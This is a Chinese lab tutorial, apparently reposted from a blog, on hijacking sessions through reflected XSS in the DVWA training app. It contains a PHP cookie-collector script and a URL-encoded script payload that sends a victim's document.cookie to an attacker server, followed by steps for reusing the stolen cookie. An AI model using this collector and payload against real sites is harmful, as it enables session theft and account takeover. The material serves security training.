理解xss-劫持会话

其他 2021-03-26 19:03:55 阅读次数: 0

xss-劫持会话攻击实验
Step01: 搭建好攻击者的Web服务器(LAMP或LNMP平台,phpstudy)
http://192.168.195.127/cookie.php
验证PHP环境
(1)看端口
Web:80
mysql:3306
php:9000
(2)验证PHP文件能不能正常解析
网站的根目录 c:\phpstudy_pro\www
创建一个test.php文件

<?php phpinfo() ?>

Step02:在攻击者的Web服务器的网站根目录下创建cookie.php

<?php $cookie=$_GET['cookie']; file_put_contents('cookie.txt',$cookie); ?>

//把获取到的用户cookie写入到cookie.txt文件中
//网站主目录对于Web用户来说要有写入的权限
http://192.168.195.127/cookie.php

(3)验证web页面是否有xss漏洞攻击

(4)构造攻击js

//document.location 将页面内容定位到指定位置

(5)构造并发送攻击URL
http://192.168.195.129/dvwa/vulnerabilities/xss_r/?name=
(6)URL编码
http%3a%2f%2f192.168.195.129%2fdvwa%2fvulnerabilities%2fxss_r%2f%3fname%3d%3cscript%3edocument.location%3d’http%3a%2f%2f127.0.0.1%2fcookie.php%3fcookie%3d’%2bdocument.cookie%3b%3c%2fscript%3e
获得cookie
http://127.0.0.1/cookie.txt(有内容了)
劫持会话
(7)在Kali中打开登录dvwa的页面
F12更改cookie(存储位置)
192.168.195.129/dvwa/index.php

猜你喜欢

转载自blog.csdn.net/qq_45320164/article/details/110053558
今日推荐
开源日报 | Chrome内置Gemini的意义不在于Gemini;中国AI追随之路的五大误区;ECharts创始人“下海”养鱼;谷歌I/O开发者大会什么都有,只是没有惊喜
微软回应中国区AI团队“打包赴美”传闻
基于大语言模型的开源知识库问答系统 MaxKB GitHub Star 数量突破 5,000 个!
美国拟限制 AI 大模型出口中国和俄罗斯
苹果将与 OpenAI 达成协议,将 ChatGPT 应用于 iPhone
openKylin 社区生态委员会第六次会议圆满召开
阿里云正式发布通义千问 2.5
Python 3.13 发布首个 Beta:实验性自由线程模式和 JIT、改进交互式解释器
Stack Overflow 拿我的代码去训练 AI 大模型,还封了我的账号
Pop!_OS 的 COSMIC 桌面完成 App Store 上架工作
《2024 年一季度互联网投融资运行情况》研究报告
报告:Django 仍然是 74% 开发者的首选
周排行
laravle中orm简单的增删改查
文本分类 特征选取之CHI开方检验
Spark核心编程-WordCount
大数据开发实战系列之电信客服(1)
读书笔记 - 把时间当作朋友 by 李笑来
python 笔记--if else
SpringBoot/Mybatis/Druid, 多数据源MultiDataSource配置思路
排序三个整数
redis集群搭建【2】-Windows中Redis集群搭建
STM32F030驱动TM1650点亮4联数码管
每日归档
更多
2024-05-16(6)
2024-05-15(24)
2024-05-14(0)
2024-05-13(18)
2024-05-12(0)
2024-05-11(38)
2024-05-10(38)
2024-05-09(35)
2024-05-08(42)
2024-05-07(14)

代码天地 © 2018 codetd.com

境外服务器   最新电视剧2022